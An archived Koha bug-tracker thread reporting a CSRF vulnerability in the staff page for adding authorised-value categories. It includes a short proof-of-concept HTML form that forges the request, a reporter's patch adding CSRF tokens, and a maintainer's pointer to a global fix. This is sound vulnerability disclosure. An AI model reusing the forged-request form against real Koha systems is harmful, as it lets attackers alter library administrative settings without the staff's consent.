[Bug 24409] New: admin/authorised_values.pl?op=add_form : Add New Category is vulnerable for CSRF attacks
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409 Bug ID: 24409 Summary: admin/authorised_values.pl?op=add_form : Add New Category is vulnerable for CSRF attacks Change sponsored?: --- Product: Koha Version: 19.11 Hardware: All OS: Linux Status: NEW Severity: major Priority: P5 - low Component: System Administration Assignee: koha-bugs@lists.koha-community.org Reporter: aman.mishra77@gmail.com QA Contact: testopia@bugs.koha-community.org CC: gmcharlt@gmail.com -- You are receiving this mail because: You are watching all bug changes. You are the assignee for the bug.
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409 --- Comment #1 from Aman Mishra <aman.mishra77@gmail.com> --- When we use this script it is allow to create new category <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://library-staff.totalit.com/cgi-bin/koha/admin/authorised_values.pl" method="POST"> <input type="hidden" name="category" value="AMAN8" /> <input type="hidden" name="op" value="add_category" /> <input type="hidden" name="id" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> -- You are receiving this mail because: You are watching all bug changes. You are the assignee for the bug.
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409 --- Comment #2 from Aman Mishra <aman.mishra77@gmail.com> --- I resolved this please chek and update this is right way or not? Add CSRF token in /usr/share/koha/intranet/cgi-bin/admin/authorised_values.pl + after line 32 +use Koha::Token; + after line 172 +my $TokenCheck = Koha::Token->new->check_csrf({ session_id => scalar $input->cookie('CGISESSID'), token => scalar $input->param('csrf_token'), }); + after line 180 +if( $TokenCheck ){ + after line 204 + } else { push @messages, {type => 'error', code => 'wrong_csrf_token' }; } + after line 81 + $template->param( csrf_token => Koha::Token->new->generate_csrf({ session_id => scalar $input->cookie('CGISESSID'), }), ); Add CSRF in /usr/share/koha/intranet/htdocs/intranet-tmpl/prog/en/modules/admin/authorised_values.tt + after line 63 +<input type="hidden" name="csrf_token" value="[% csrf_token | html %]" /> + after line 184 + [% CASE 'wrong_csrf_token' %] <div class="dialog message">The form submission failed (Wrong CSRF token). Try to come back, refresh the page, then try again.</div> Now test your application. Thanks Aman Mishra Sr. Software Engineer Total IT Software Solutions Pvt. Ltd. India -- You are receiving this mail because: You are the assignee for the bug. You are watching all bug changes.
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409 Aman Mishra <aman.mishra77@gmail.com> changed: What |Removed |Added ---------------------------------------------------------------------------- CC| |aman.mishra77@gmail.com -- You are receiving this mail because: You are watching all bug changes.
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409 Jonathan Druart <jonathan.druart@bugs.koha-community.org> changed: What |Removed |Added ---------------------------------------------------------------------------- See Also| |https://bugs.koha-community | |.org/bugzilla3/show_bug.cgi | |?id=22990 Version|19.11 |unspecified CC| |jonathan.druart@bugs.koha-c | |ommunity.org --- Comment #3 from Jonathan Druart <jonathan.druart@bugs.koha-community.org> --- Yes, that may work. However we are going to fix them globally, see bug 22990 for more information. -- You are receiving this mail because: You are watching all bug changes. You are the assignee for the bug.
participants (1)
-
bugzilla-daemon@bugs.koha-community.org